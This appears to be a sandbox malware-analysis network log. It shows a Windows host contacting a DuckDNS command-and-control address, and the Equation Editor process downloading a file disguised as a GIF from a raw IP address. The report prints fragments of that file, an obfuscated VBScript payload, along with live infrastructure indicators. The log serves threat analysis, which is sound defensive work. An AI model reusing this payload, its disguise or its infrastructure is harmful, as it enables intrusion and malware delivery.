                                                        Jul 26, 2024 15:12:01.919606924 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:01.919621944 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:01.919712067 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:01.919718981 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:01.919732094 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:01.919739008 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.688330889 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.711402893 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:02.716891050 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.716916084 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.716932058 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.717225075 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.717242002 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.717271090 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.717288971 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:02.948793888 CEST4916980192.168.2.22178.237.33.50
                                                        Jul 26, 2024 15:12:02.954057932 CEST8049169178.237.33.50192.168.2.22
                                                        Jul 26, 2024 15:12:03.781196117 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:03.826021910 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:03.833353996 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:03.833384991 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:03.833427906 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:03.833447933 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:03.833465099 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:03.833482981 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:03.833498001 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.054112911 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.077858925 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:05.083199978 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.083220005 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.083283901 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.083296061 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.083319902 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.083380938 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.083398104 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.661458969 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.686022997 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:05.691570997 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.691679955 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.691692114 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.691709995 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.691749096 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.691823006 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:05.691847086 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.400160074 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.430366039 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:06.435349941 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.435381889 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.435398102 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.435416937 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.435444117 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.435456038 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.435477018 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.954272032 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:06.955682039 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:06.960803032 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.192507982 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.217164993 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:07.222215891 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.222238064 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.222259998 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.222310066 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.222480059 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.222615004 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:07.222841024 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.333012104 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.359219074 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:08.364623070 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.364645958 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.364670038 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.365344048 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.365353107 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.365367889 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:08.365381002 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.477421999 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.499870062 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:09.505728006 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.505748987 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.505788088 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.505817890 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.505832911 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.505852938 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:09.505892038 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.176816940 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.201643944 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:10.207375050 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.207422018 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.207437992 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.207696915 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.207712889 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.207731962 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:10.207747936 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.033664942 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.065326929 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:11.070552111 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.070564985 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.070574045 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.070590973 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.070924997 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.070933104 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.070950031 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.750973940 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.777762890 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:11.787483931 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.787516117 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.787633896 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.787662029 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.787720919 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.787749052 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.787775040 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:11.787801981 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.860230923 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.882708073 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:12.887985945 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.888005018 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.888020039 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.888031960 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.888065100 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.888078928 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.888091087 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:12.888103008 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.009919882 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.035514116 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:14.041281939 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.041325092 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.041388988 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.041419029 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.041445017 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.041479111 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.041506052 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:14.041640043 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.104517937 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.128703117 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:15.133914948 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.133999109 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.134017944 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.134049892 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.134077072 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.134093046 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.134500027 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.134618998 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.450526953 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:15.450587034 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:15.450628996 CEST4917457483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:15.455662012 CEST5748349174192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:37.290220976 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:37.518564939 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:37.524072886 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:12:37.524133921 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:38.610802889 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:12:38.617778063 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:13:07.782830954 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:13:07.784398079 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:13:07.790107965 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:13:38.241635084 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:13:38.383899927 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:13:38.385857105 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:13:38.385912895 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:13:38.389038086 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:14:08.434850931 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:14:08.567013025 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:14:08.572042942 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:14:38.779258966 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:14:38.795389891 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:14:38.800555944 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:15:09.121793032 CEST5748349166192.253.251.227192.168.2.22
                                                        Jul 26, 2024 15:15:09.124524117 CEST4916657483192.168.2.22192.253.251.227
                                                        Jul 26, 2024 15:15:09.129791021 CEST5748349166192.253.251.227192.168.2.22
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 26, 2024 15:10:54.814289093 CEST5456253192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:10:55.822009087 CEST5456253192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:10:56.836096048 CEST5456253192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:10:58.848449945 CEST5456253192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:10:59.821578026 CEST53545628.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:10:59.824412107 CEST5291753192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:11:00.829603910 CEST5291753192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:11:00.835444927 CEST53545628.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:00.922930002 CEST53529178.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:00.927479029 CEST53529178.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:01.842974901 CEST53545628.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:01.949640989 CEST53545628.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:05.072448969 CEST6275153192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:11:05.082427979 CEST53627518.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:14.868199110 CEST5499853192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:11:14.875437021 CEST53549988.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:26.958233118 CEST5278153192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:11:27.187695026 CEST53527818.8.8.8192.168.2.22
                                                        Jul 26, 2024 15:11:27.188010931 CEST5278153192.168.2.228.8.8.8
                                                        Jul 26, 2024 15:11:27.198756933 CEST53527818.8.8.8192.168.2.22
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Jul 26, 2024 15:11:00.835644960 CEST192.168.2.228.8.8.8d014(Port unreachable)Destination Unreachable
                                                        Jul 26, 2024 15:11:01.843146086 CEST192.168.2.228.8.8.8d014(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jul 26, 2024 15:10:54.814289093 CEST192.168.2.228.8.8.80xe1e6Standard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:10:55.822009087 CEST192.168.2.228.8.8.80xe1e6Standard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:10:56.836096048 CEST192.168.2.228.8.8.80xe1e6Standard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:10:58.848449945 CEST192.168.2.228.8.8.80xe1e6Standard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:10:59.824412107 CEST192.168.2.228.8.8.80x835fStandard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:00.829603910 CEST192.168.2.228.8.8.80x835fStandard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:05.072448969 CEST192.168.2.228.8.8.80xa4d3Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:14.868199110 CEST192.168.2.228.8.8.80x1884Standard query (0)asociatiatraditiimaria.roA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:26.958233118 CEST192.168.2.228.8.8.80xb45eStandard query (0)new.quranushaiqer.org.saA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:27.188010931 CEST192.168.2.228.8.8.80xb45eStandard query (0)new.quranushaiqer.org.saA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jul 26, 2024 15:10:59.821578026 CEST8.8.8.8192.168.2.220xe1e6Server failure (2)iwarsut775laudrye2.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:00.835444927 CEST8.8.8.8192.168.2.220xe1e6Server failure (2)iwarsut775laudrye2.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:00.922930002 CEST8.8.8.8192.168.2.220x835fNo error (0)iwarsut775laudrye2.duckdns.org192.253.251.227A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:00.927479029 CEST8.8.8.8192.168.2.220x835fNo error (0)iwarsut775laudrye2.duckdns.org192.253.251.227A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:01.842974901 CEST8.8.8.8192.168.2.220xe1e6Server failure (2)iwarsut775laudrye2.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:01.949640989 CEST8.8.8.8192.168.2.220xe1e6No error (0)iwarsut775laudrye2.duckdns.org192.253.251.227A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:05.082427979 CEST8.8.8.8192.168.2.220xa4d3No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:09.882883072 CEST8.8.8.8192.168.2.220x9f15No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:09.882883072 CEST8.8.8.8192.168.2.220x9f15No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:14.875437021 CEST8.8.8.8192.168.2.220x1884No error (0)asociatiatraditiimaria.ro93.113.54.56A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:27.187695026 CEST8.8.8.8192.168.2.220xb45eNo error (0)new.quranushaiqer.org.sa34.166.62.190A (IP address)IN (0x0001)false
                                                        Jul 26, 2024 15:11:27.198756933 CEST8.8.8.8192.168.2.220xb45eNo error (0)new.quranushaiqer.org.sa34.166.62.190A (IP address)IN (0x0001)false
                                                        • asociatiatraditiimaria.ro
                                                        • new.quranushaiqer.org.sa
                                                        • 104.168.45.34
                                                        • 198.46.176.133
                                                        • geoplugin.net
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.2249163104.168.45.3480428C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        TimestampBytes transferredDirectionData
                                                        Jul 26, 2024 15:10:46.398715019 CEST345OUTGET /59/createdthingstobefrankwithmeeverywhere.gIF HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 104.168.45.34
                                                        Connection: Keep-Alive
                                                        Jul 26, 2024 15:10:46.931420088 CEST1236INHTTP/1.1 200 OK
                                                        Date: Fri, 26 Jul 2024 13:10:46 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                        Last-Modified: Fri, 26 Jul 2024 06:30:51 GMT
                                                        ETag: "65850-61e20a7199236"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 415824
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: image/gif
                                                        Data Raw: ff fe 64 00 69 00 6d 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 0d 00 0a 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 3d 00 20 00 6f 00 70 00 73 00 6f 00 70 00 68 00 61 00 67 00 69 00 61 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 62 00 69 00 73 00 74 00 6f 00 72 00 74 00 61 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 6c 00 61 00 63 00 68 00 61 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 63 00 61 00 6e 00 74 00 6f 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 76 00 75 00 6c 00 67 00 6f 00 63 00 72 00 61 00 63 00 69 00 61 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 [TRUNCATED]
                                                        Data Ascii: dim gamelan gamelan = opsophagiacabirto("bistorta") & gamelan & _cabirto("lacha") & gamelan & _cabirto("canto") & gamelan & _cabirto("vulgocracia") & gamelan & _cabirto("X_HelpUris_005_0_Message") & gamelan & _cabirto("coisica") & gamelan & _cabirto("portello") & gamelan & _cabirto("X_HelpUris_008_0_Message") & gamelan & _cabirto("X_HelpUris_009_0_Message") & gamelan & _cabirto("X_HelpUris_010_0_Message") & gamelan & _cabirto("L_Hel
                                                        Jul 26, 2024 15:10:46.931763887 CEST224INData Raw: 70 00 55 00 72 00 69 00 73 00 5f 00 30 00 31 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00
                                                        Data Ascii: pUris_011_0_Message") & gamelan & _cabirto("L_HelpUris_012_0_Message") & gamelan & _cabirto("X_HelpUris_013_
                                                        Jul 26, 2024 15:10:46.931775093 CEST1236INData Raw: 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00
                                                        Data Ascii: 0_Message") & gamelan & _cabirto("X_HelpUris_013_1_Message") & gamelan & _cabirto("X_HelpUris_014_0_Message") & gamela
                                                        Jul 26, 2024 15:10:46.932776928 CEST1236INData Raw: 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 55 00 72 00 69 00 73 00 5f 00
                                                        Data Ascii: age") & gamelan & _cabirto("L_HelpUris_016_0_Message") & gamelan & _cabirto("L_HelpUris_017_0_Message") & gamelan & _
                                                        Jul 26, 2024 15:10:46.932789087 CEST1236INData Raw: 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 58 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 34 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00
                                                        Data Ascii: _cabirto("X_HelpAlias_004_0_Message") & gamelanE & _cabirto("X_HelpAlias_005_0_Message") & gamelanE & _cabirto("X_H
                                                        Jul 26, 2024 15:10:46.934456110 CEST1236INData Raw: 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 73 00 65 00 76 00 61 00 6e 00 64 00 69 00 6a 00 61 00 22 00
                                                        Data Ascii: age") & gamelanE & _cabirto("sevandija") & gamelanE & _cabirto("autepsa") & gamelanE & _cabirto("corocuturu")dim
                                                        Jul 26, 2024 15:10:46.934468031 CEST1236INData Raw: 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 4c 00 5f 00 48 00
                                                        Data Ascii: 0_Message") & egamelanE & _cabirto("L_HelpAlias_010_0_Message") & egamelanE & _cabirto("L_HelpAlias_011_0_Message") &
                                                        Jul 26, 2024 15:10:46.936172962 CEST1236INData Raw: 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 33 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00
                                                        Data Ascii: elpAlias_003_0_Message") & oegamelanE & _cabirto("X_HelpAlias_004_0_Message") & oegamelanE & _cabirto("X_HelpAlias_005
                                                        Jul 26, 2024 15:10:46.936187029 CEST1236INData Raw: 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 58 00 5f 00
                                                        Data Ascii: 0_Message") & oegamelanE & _cabirto("X_HelpAlias_015_0_Message") & oegamelanE & _cabirto("sevandija") & oegamelanE & _
                                                        Jul 26, 2024 15:10:46.937915087 CEST1236INData Raw: 70 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 3a 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 55 00 4e 00 4b 00 4f 00 50 00 54 00 5f 00 45 00 72 00 72 00 6f 00 72 00
